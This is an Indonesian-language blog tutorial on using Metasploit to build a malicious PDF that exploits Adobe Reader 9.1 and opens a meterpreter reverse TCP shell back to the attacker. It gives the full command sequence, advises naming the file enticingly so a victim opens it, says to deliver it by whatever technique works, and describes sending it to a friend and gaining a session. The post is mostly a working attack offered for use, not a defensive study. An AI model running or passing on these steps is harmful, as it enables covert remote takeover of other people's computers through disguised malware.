codingator.blogspot.com,Depok - Hy guys pagi ini saya akan membuat tutorial Exploit menggunakan Adobe PDF dengan Metasploit, berikut bahan-bahan yang diperlukan guys :
|
via: indonesianbacktrack.or.id |
Level : Medium, Hard
Testing : Win XP SP3, Windows 7
Vulnerable Application Testing : Adobe Reader 9.1
Requirement :
1. Metasploit Framework
2. Windows or Linux OS(I'm using Kali Linux in this tutorial)Berikut ini tahap-tahapannya :
Buka terminal anda dan ketikan ini:
Command :
service postgresql start
service metasploit start
msfconsole
|
via : indonesiabacktrack.or.id |
jika sudah terbuka metasploit anda ketikan ini:
Command :
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
set payload windows/meterpreter/reverse_tcp
set filename tugas.pdf
set lhost 192.168.1.100
set lport 443
exploit
Keterangan:use exploit Use adobe pdf embedded exe exploit
set payload window set the payload to return meterpreter script when exploit successfully performed
set filename tugas.pdf --> Membuat file ini semenarik Anda sehingga korban akan membuka PDF berbahaya Anda.
set lhost 192.168.1.100 --> Ip Anda
set lport 443 --> Saya menggunakan port ini (443 selalu terbuka: p)
exploit --> menghasilkan PDF berbahaya
|
via : indonesiabacktrack.or.id |
Setelah berhasil menghasilkan PDF, itu akan disimpan di komputer lokal Anda buka folder home CTRL+H /root/.msf4/local/(nama pdf)
Langkah selanjutnya adalah mengirimkan pdf kita untuk menargetkan ke korban, terserah mau pakai teknik apa jg bro yang penting file pdf sampai dikomputer korban. Dalam hal ini saya akan kirimkan ke teman saya ma*******@gmail.com kebetulan teman ane masih pakai wedus XP.
setelah file kita berada di pc korban tinggal ketikan ini di terminal:
Command :
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 443
set lhost 192.168.1.100 (ip anda)
exploit
|
via : indonesiabacktrack.co.id |
dan gotcha ane dapet sessionnya setelah teman ane membuka pdfnya
Thanks :
indonesianbacktrack
Belum ada tanggapan untuk "Exploid Menggunakan Adobe PDF Dengan Metasploit"
Post a Comment